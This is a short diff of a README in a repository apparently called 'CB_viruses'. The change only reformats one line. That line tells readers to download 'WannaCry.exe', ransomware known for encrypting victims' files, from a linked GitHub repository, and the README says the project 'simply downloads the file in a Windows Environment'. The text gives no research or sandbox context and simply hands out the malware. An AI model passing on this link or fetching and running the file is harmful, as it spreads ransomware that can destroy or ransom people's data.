Choudhary665Shivam/CB_viruses/README.md

 # CB_viruses
 Simply downloads the file in a Windows Environment

-\n Go to the following link to download WannaCry.exe https://github.com/Explodingstuff/WannaCry/blob/master/WannaCry.EXE
+Go to the following link to download WannaCry.exe https://github.com/Explodingstuff/WannaCry/blob/master/WannaCry.EXE